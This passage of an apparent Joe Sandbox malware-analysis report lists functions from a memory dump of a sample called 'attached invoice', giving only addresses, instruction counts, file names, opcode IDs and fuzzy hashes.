                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: e7e4f96be149602e16cc824d46dfd3edb7b993303d044ff02491d570fd9be363
                                                                                                    • Instruction ID: 3633806c654f23deebaf6b339743120714941da7b65fa2fe057be056d735cf8e
                                                                                                    • Opcode Fuzzy Hash: e7e4f96be149602e16cc824d46dfd3edb7b993303d044ff02491d570fd9be363
                                                                                                    • Instruction Fuzzy Hash: 7BF0F0722443465AE32496098C40B62778BE7C1710F34802EEB05CB692EB71AE01C355
                                                                                                    Function 0191648A Relevance: .0, Instructions: 39COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.811738580273.00000000018B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018B0000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_18b0000_attached invoice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 94f384cbb737f5af129476e91aa86a0042860af0232434ebc6a2006867a2b881
                                                                                                    • Instruction ID: cd0cb6f33665d7a7c8b27b1102c946e2635317eb264aa7e57d1149ebdb0f1179
                                                                                                    • Opcode Fuzzy Hash: 94f384cbb737f5af129476e91aa86a0042860af0232434ebc6a2006867a2b881
                                                                                                    • Instruction Fuzzy Hash: 3001DC707846809BF7268B2CCD88F2537ADBB61F01F080490BE099B6D6E7A8D8808320
                                                                                                    Function 0196C51D Relevance: .0, Instructions: 36COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.811738580273.00000000018B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018B0000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_18b0000_attached invoice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: a73bb9183a38397a36eae851ff6f845dda0cefb6038563357bb1225819f30369
                                                                                                    • Instruction ID: 3ff5079d99caf796e230b8e2175def016392c18af3f6b1337e19f5a29a3a7f79
                                                                                                    • Opcode Fuzzy Hash: a73bb9183a38397a36eae851ff6f845dda0cefb6038563357bb1225819f30369
                                                                                                    • Instruction Fuzzy Hash: 24F0A4702093049FC314EF29C941E1AB7E8EF98B00F404A5EF898DB394E634E900C756
                                                                                                    Function 0196E4F2 Relevance: .0, Instructions: 36COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.811738580273.00000000018B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018B0000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_18b0000_attached invoice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 2d61a3bfed072bebc3533729a18c2e1d60e765f99e10e027ec57f31171bb3125
                                                                                                    • Instruction ID: 17429dc8473e27309ecdcbb61b1b9aa5c6217f8c6c901e4e35553cd0ce1636d6
                                                                                                    • Opcode Fuzzy Hash: 2d61a3bfed072bebc3533729a18c2e1d60e765f99e10e027ec57f31171bb3125
                                                                                                    • Instruction Fuzzy Hash: 1EF054373056129BDB31DA4DD890F12B7BCAF95A60F190869A608DB250E760EC01C7A0
                                                                                                    Function 01910774 Relevance: .0, Instructions: 35COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.811738580273.00000000018B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018B0000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_18b0000_attached invoice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 1b7835e4d6d6559359274cfa51e41153a2ed1920ea28c928af81b6d046f1638e
                                                                                                    • Instruction ID: e5033fc07b5b4bd3162a6213be96712a5e451096f0923becdd846e9086f81d19
                                                                                                    • Opcode Fuzzy Hash: 1b7835e4d6d6559359274cfa51e41153a2ed1920ea28c928af81b6d046f1638e
                                                                                                    • Instruction Fuzzy Hash: 8DF02472600209AFE314DB25CD00F46B7E9EF98310F188078A508C71A0FAB2EE80C614
                                                                                                    Function 019689A0 Relevance: .0, Instructions: 35COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.811738580273.00000000018B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018B0000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_18b0000_attached invoice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 99bc5f8ef290dbb00d5356c1b90a40489ddd8ae9bb92282c5a4a7cae638d4f8a
                                                                                                    • Instruction ID: 92a2d2da09fa075e791ba5b354b275005fb5aee01a5da4279b43776cecb0112e
                                                                                                    • Opcode Fuzzy Hash: 99bc5f8ef290dbb00d5356c1b90a40489ddd8ae9bb92282c5a4a7cae638d4f8a
                                                                                                    • Instruction Fuzzy Hash: F7F0B4325043445BE7216A1CD848B6AFBADFB94755F0A4415FA8D6711586306C80C7A1
                                                                                                    Function 0196C592 Relevance: .0, Instructions: 34COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.811738580273.00000000018B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018B0000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_18b0000_attached invoice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 895e52d659d9936ef4c2c7f3d61f7781eca21253977c5f506fcdd6a18815b2db
                                                                                                    • Instruction ID: 95971b1f2f87a334df40e855ba184d62cf23b8ff0ff1804710644a4bcdb46f31
                                                                                                    • Opcode Fuzzy Hash: 895e52d659d9936ef4c2c7f3d61f7781eca21253977c5f506fcdd6a18815b2db
                                                                                                    • Instruction Fuzzy Hash: 5BF06270A05209DFCB04EF69C515F5EB7B8EF58300F008059F915EB385DA34EA01CB64
                                                                                                    Function 018E471B Relevance: .0, Instructions: 33COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.811738580273.00000000018B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018B0000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_18b0000_attached invoice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 4a146cc50849a799f223aef2b886b07a2e99f98ecd8c28fcffe93fc6cd05b660
                                                                                                    • Instruction ID: 6599cee0ea71313a5116225e1197a73e1caf8af69606c198f591a48adda7d2b2
                                                                                                    • Opcode Fuzzy Hash: 4a146cc50849a799f223aef2b886b07a2e99f98ecd8c28fcffe93fc6cd05b660
                                                                                                    • Instruction Fuzzy Hash: CFF0247158129C8EEB32832CC84CB617BC49B033A4F084866C52DCF512C368DF84C2D0
                                                                                                    Function 0191C50D Relevance: .0, Instructions: 31COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.811738580273.00000000018B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018B0000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_18b0000_attached invoice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: e506c32561a46ae26b94873799827248b66f20cacf37333e1ffb7bd5bbbf34e6
                                                                                                    • Instruction ID: 810ff9bfbe62289f179f09867ee908e0b86e64e6f47b23acd4fb4aa418bd6dc5
                                                                                                    • Opcode Fuzzy Hash: e506c32561a46ae26b94873799827248b66f20cacf37333e1ffb7bd5bbbf34e6
                                                                                                    • Instruction Fuzzy Hash: E9F097B1A9D688DFE322935CC08CB617BDC9B01765F058424C50ECB606C330E8C0C680
                                                                                                    Function 01922539 Relevance: .0, Instructions: 31COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.811738580273.00000000018B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018B0000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_18b0000_attached invoice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 2ed3d22eeff636eb0551a0025a211ec4f1b1c67496731614af6a82ea339e5be1
                                                                                                    • Instruction ID: 0aa5deabc05677c78ce552f740df612463e727ca646af1df592e65598f1dcdf4
                                                                                                    • Opcode Fuzzy Hash: 2ed3d22eeff636eb0551a0025a211ec4f1b1c67496731614af6a82ea339e5be1
                                                                                                    • Instruction Fuzzy Hash: CBE0D8323419512BE711AF598CD4F477B9EDFD2710F04447DFA085F195CAE2DD0982A0
                                                                                                    Function 019B4DA7 Relevance: .0, Instructions: 30COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.811738580273.00000000018B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018B0000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_18b0000_attached invoice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: e04aa16a0c77a7076e753bdfa941a0262c552d13474680d7a0d4aac2de8194cf
                                                                                                    • Instruction ID: a4e91a51a21ccd704f447789b4fe83db47dee2c414f65d716a262db343a122cf
                                                                                                    • Opcode Fuzzy Hash: e04aa16a0c77a7076e753bdfa941a0262c552d13474680d7a0d4aac2de8194cf
                                                                                                    • Instruction Fuzzy Hash: B0F0A770A14219AFDB14EBB8D945FAEB7F8AF44704F01045CFA06EB2C5EA74E900C754
                                                                                                    Function 019B4D4B Relevance: .0, Instructions: 30COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.811738580273.00000000018B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018B0000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_18b0000_attached invoice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 181b04be4f947a5eb166b471ca5e9ac0ef28206ee72fe843ceec20d41cbe4dd7
                                                                                                    • Instruction ID: 53f825240dc849ef36d846fafd602caa8fe338b32a98a881a95fed01d303c01b
                                                                                                    • Opcode Fuzzy Hash: 181b04be4f947a5eb166b471ca5e9ac0ef28206ee72fe843ceec20d41cbe4dd7
                                                                                                    • Instruction Fuzzy Hash: 35F0A770A14259AFDB04EBB8DA45FAEB7F8BF54704F000458FA06EB2C1EA74E900C755
                                                                                                    Function 018E0630 Relevance: .0, Instructions: 28COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.811738580273.00000000018B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018B0000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_18b0000_attached invoice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 7fb8b229e0179ed1d94183841a0f137a63d66d46d99527f7ccba905b47740c18
                                                                                                    • Instruction ID: f545825812f9b6b53f4a0069fcb64e7c304b1dc4cc5ae71d00ce6f300981e7fb
                                                                                                    • Opcode Fuzzy Hash: 7fb8b229e0179ed1d94183841a0f137a63d66d46d99527f7ccba905b47740c18
                                                                                                    • Instruction Fuzzy Hash: 2BF0A0353043449BCB05CF1AC044BA57BE8BB96364B100894FC49CB351D671EE41CB81
                                                                                                    Function 019148F0 Relevance: .0, Instructions: 28COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.811738580273.00000000018B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018B0000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_18b0000_attached invoice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: f1b670d1cf9650df618e53f56da6216e466ca8c332a8d3f17e7fbf4f9511b07c
                                                                                                    • Instruction ID: ec70152fd9271af211ce78cdde38dd76e83d730cf9659880d6771e66013bee90
                                                                                                    • Opcode Fuzzy Hash: f1b670d1cf9650df618e53f56da6216e466ca8c332a8d3f17e7fbf4f9511b07c
                                                                                                    • Instruction Fuzzy Hash: EFE09232244109ABD7256E699800F6A77AB9BD8B62F151839E2888B244DB70D881C390
                                                                                                    Function 018DEBC0 Relevance: .0, Instructions: 28COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.811738580273.00000000018B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018B0000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_18b0000_attached invoice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: e4006c1d87aeaf3b1e9d60ac6313c76d7ac9985f5ac1451b1c7dcc12017ca6ee
                                                                                                    • Instruction ID: 8137c5a0ac3e463f7c6cd1f5eb5d37438f64d98d838117b36d404d4dc049882f
                                                                                                    • Opcode Fuzzy Hash: e4006c1d87aeaf3b1e9d60ac6313c76d7ac9985f5ac1451b1c7dcc12017ca6ee
                                                                                                    • Instruction Fuzzy Hash: 46F06531104399AFEB259F08C445F553BA5EB94734F048019F54BDF152CF76EA80DB65
                                                                                                    Function 018D8DCD Relevance: .0, Instructions: 28COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.811738580273.00000000018B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018B0000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_18b0000_attached invoice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: b32b66a64eb686ce2550eafeac90f07ee095e5a4bc4a895fda5be1685579c209
                                                                                                    • Instruction ID: 28cdee7c2726ba77ba5e05fd24157a290efa4adec01750a1655884897f7db8c7
                                                                                                    • Opcode Fuzzy Hash: b32b66a64eb686ce2550eafeac90f07ee095e5a4bc4a895fda5be1685579c209
                                                                                                    • Instruction Fuzzy Hash: 9FF0A031101715DFC7326B18DC11B1677E5AF92735F01461DE15B87CE1CB30AC42DA45
                                                                                                    Function 0198630E Relevance: .0, Instructions: 27COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.811738580273.00000000018B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018B0000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_18b0000_attached invoice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: e34d8b1e9544b35a6832514a92fbb8c39f367d50107a00a5c84dc41f29603271
                                                                                                    • Instruction ID: 75522ea11d9d3eb55de4267c569dc18ccfaf547ae217e7968ba8fcf7dd011412
                                                                                                    • Opcode Fuzzy Hash: e34d8b1e9544b35a6832514a92fbb8c39f367d50107a00a5c84dc41f29603271
                                                                                                    • Instruction Fuzzy Hash: B3E04F73A41124BBDF21A7998D05F9BBEACDBA4BA1F150065BA05EB190D670DE00D690
                                                                                                    Function 018E2500 Relevance: .0, Instructions: 23COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.811738580273.00000000018B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018B0000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_18b0000_attached invoice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: InitializeThunk
                                                                                                    • String ID:
                                                                                                    • API String ID: 2994545307-0
                                                                                                    • Opcode ID: f674d3ef3efb97c708d0cf9a190bbf56657b845ab71fb17284db1779ca8f228a
                                                                                                    • Instruction ID: dae880371335f148093b86e14d13182dd6bd79aaa86a6dce48b5e989c1d65d0c
                                                                                                    • Opcode Fuzzy Hash: f674d3ef3efb97c708d0cf9a190bbf56657b845ab71fb17284db1779ca8f228a
                                                                                                    • Instruction Fuzzy Hash: C3E092321005549BC321BB18DD15F9A77DAEBA1360F014518F11A976A0CB30AA10CBC5
                                                                                                    Function 0191C958 Relevance: .0, Instructions: 22COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.811738580273.00000000018B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018B0000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_18b0000_attached invoice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: d6c377eeffffe966f60c4f2381b1081f5fcd213ffa47eb073245e2659b106a57
                                                                                                    • Instruction ID: 0800ec58947ec595bc90f813abdd9dec2b95acd67963a373f0f85e2407e33774
                                                                                                    • Opcode Fuzzy Hash: d6c377eeffffe966f60c4f2381b1081f5fcd213ffa47eb073245e2659b106a57
                                                                                                    • Instruction Fuzzy Hash: D0D02B320971216ECB73B1297C00FA32A5EAB45360F050870F10CE3054D514CCC1C6C4
                                                                                                    Function 018D81EB Relevance: .0, Instructions: 21COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.811738580273.00000000018B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018B0000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_18b0000_attached invoice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 114db9202c54257abf2526529968dd102c67066819c003b1d4cdd2b3c6882db7
                                                                                                    • Instruction ID: df1005e5097e3b6ff57f4ec5071fb9427506645be7f8f809b3a0ba6dbff0f602
                                                                                                    • Opcode Fuzzy Hash: 114db9202c54257abf2526529968dd102c67066819c003b1d4cdd2b3c6882db7
                                                                                                    • Instruction Fuzzy Hash: 8BE0C232040A29EFDB322B28DC00F5577A5FF81710F20056AF08B864A48BB49985DA49
                                                                                                    Function 019189B0 Relevance: .0, Instructions: 20COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.811738580273.00000000018B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018B0000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_18b0000_attached invoice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 4861f5a381a69e507ddb33788bd9690c3cd67957beffc440e81982ecee0e9c4e
                                                                                                    • Instruction ID: 6525d5ccdccf24b6aef89fede6f00b2b51adcc56c5194bee3246447805439ac3
                                                                                                    • Opcode Fuzzy Hash: 4861f5a381a69e507ddb33788bd9690c3cd67957beffc440e81982ecee0e9c4e
                                                                                                    • Instruction Fuzzy Hash: 54E02633110A0887C328DE18C512B7277A9FF44720F04423EA61747784C530E444D7D9
                                                                                                    Function 01936912 Relevance: .0, Instructions: 17COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.811738580273.00000000018B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018B0000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_18b0000_attached invoice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 9eeef1791f682d1806daff088d782c605668e39cbad21fc7d49dd3969ced6bd8
                                                                                                    • Instruction ID: 5e444a0898161ca384240d79ad76d33ec859575f70ba187b540b6e8bed5b236f
                                                                                                    • Opcode Fuzzy Hash: 9eeef1791f682d1806daff088d782c605668e39cbad21fc7d49dd3969ced6bd8
                                                                                                    • Instruction Fuzzy Hash: 30D05E32501A40AFC7325F0BEE04D53BBF9FBD4B517050A2EA54583920C770E902CBA0
                                                                                                    Function 0195E588 Relevance: .0, Instructions: 16COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.811738580273.00000000018B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018B0000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_18b0000_attached invoice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 52e1c536986b7be52acab18f0f65ce6b57b56a1f95f795bf6ae5db3b9db2cf4f
                                                                                                    • Instruction ID: 7eb3067bd5e6de06c7b9c2751eb5da6271efc5fd4429149a5f5678a217bf2177
                                                                                                    • Opcode Fuzzy Hash: 52e1c536986b7be52acab18f0f65ce6b57b56a1f95f795bf6ae5db3b9db2cf4f
                                                                                                    • Instruction Fuzzy Hash: B0E08C359406849FCF12DB8DCA40F4ABBF9BB80B00F180408A908AB660D325EE01CB40
                                                                                                    Function 0191E4BC Relevance: .0, Instructions: 16COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.811738580273.00000000018B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018B0000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_18b0000_attached invoice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 5a3d40c4745f6345f33bf01183ce61f2c0162c83d53e40109a16f3db65756406
                                                                                                    • Instruction ID: ce2ab7c903af72ee888359145f9234ba9d721667a277d241bf8a6ff3ae01d790
                                                                                                    • Opcode Fuzzy Hash: 5a3d40c4745f6345f33bf01183ce61f2c0162c83d53e40109a16f3db65756406
                                                                                                    • Instruction Fuzzy Hash: AAD0A932204610ABD772AA2CFC00FD333E8BB88B22F020859B508C7051C364EC81C680
                                                                                                    Function 018DA093 Relevance: .0, Instructions: 15COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.811738580273.00000000018B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018B0000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_18b0000_attached invoice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: cd39b431740b0d27950a5382705b11406bf46ab810de4961f59ef8eab177e8e3
                                                                                                    • Instruction ID: 03670541502aec45e4947638d2ab050d838e0ead86fac499a6cc7239dc3c008b
                                                                                                    • Opcode Fuzzy Hash: cd39b431740b0d27950a5382705b11406bf46ab810de4961f59ef8eab177e8e3
                                                                                                    • Instruction Fuzzy Hash: A0D02233202030D3CB3C2A496920F637B04AB80B90F2A002C390AC3800C1008D42C6E0
                                                                                                    Function 0191A750 Relevance: .0, Instructions: 14COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.811738580273.00000000018B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018B0000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_18b0000_attached invoice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 5864ed2f3896c9ef293a2b15130b013708e0d33e54b768a67b2e33eeb472f52c
                                                                                                    • Instruction ID: 377270f5bf3810e4996495781f4dbb480908d32dd16e0628b721fa85b5cbc7b5
                                                                                                    • Opcode Fuzzy Hash: 5864ed2f3896c9ef293a2b15130b013708e0d33e54b768a67b2e33eeb472f52c
                                                                                                    • Instruction Fuzzy Hash: 30D012371D054DBBCB119F65DC11F957BA9E7A4BA0F044420BA04C75A0CA3AE950D584
                                                                                                    Function 0191C944 Relevance: .0, Instructions: 14COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.811738580273.00000000018B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018B0000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_18b0000_attached invoice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 99773eee52005b5e7f9f7c81868e17c6c519f51d8079f9e4e6c5e644985814ea
                                                                                                    • Instruction ID: 15e83c53acfea59a61ecd3d9b35a832de5e71aa03feba5344a260733a29e75e9
                                                                                                    • Opcode Fuzzy Hash: 99773eee52005b5e7f9f7c81868e17c6c519f51d8079f9e4e6c5e644985814ea
                                                                                                    • Instruction Fuzzy Hash: F8D0A73064140ACBDF66CB05C610E2D7B79FB147C1B400458EA06E2411D324EC40C740
                                                                                                    Function 018F01C0 Relevance: .0, Instructions: 12COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.811738580273.00000000018B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018B0000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_18b0000_attached invoice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 9a34f73ca023a4a6a785f5d272c303ec3737921b4ae57e2e5ea1d679eb78ef85
                                                                                                    • Instruction ID: f9e573afe18064d5ebb216ca451c5aeec3aac4d16104c746271f5fc600282cb1
                                                                                                    • Opcode Fuzzy Hash: 9a34f73ca023a4a6a785f5d272c303ec3737921b4ae57e2e5ea1d679eb78ef85
                                                                                                    • Instruction Fuzzy Hash: 1AD0C935312D80CFD71BCB0CC894B0533A8BB44B40F810490E901CB722D22CDA84CA00
                                                                                                    Function 0191C620 Relevance: .0, Instructions: 12COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.811738580273.00000000018B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018B0000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_18b0000_attached invoice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 8b26b5d956b916a6823f9d5f3f736f76b5a6e9545a82aefec3b8cf0bc66e7001
                                                                                                    • Instruction ID: f0ddc93e2a9e316731653c2ef5fa3d96cf0d6d4a8fbe863abeadfdbbf10be3b9
                                                                                                    • Opcode Fuzzy Hash: 8b26b5d956b916a6823f9d5f3f736f76b5a6e9545a82aefec3b8cf0bc66e7001
                                                                                                    • Instruction Fuzzy Hash: 7CC01232290648AFC722AA98CD11F027BA9EBA8B40F000421F7048B670C631E920EA88
                                                                                                    Function 01900230 Relevance: .0, Instructions: 11COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.811738580273.00000000018B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018B0000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_18b0000_attached invoice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: b20a69916aee968c3675073d0381efa581de60bf3984a7ac555cf611b84c4bee
                                                                                                    • Instruction ID: 3c18e9fb2198224f875f84b6b38f68b5b9853a37a4b64161177c5238f76f9f48
                                                                                                    • Opcode Fuzzy Hash: b20a69916aee968c3675073d0381efa581de60bf3984a7ac555cf611b84c4bee
                                                                                                    • Instruction Fuzzy Hash: 93D0123610024CEFCB02DF44C850E5A772AFFD8750F148019FD1D07650CA31ED62DA50
                                                                                                    Function 018E0670 Relevance: .0, Instructions: 9COMMON
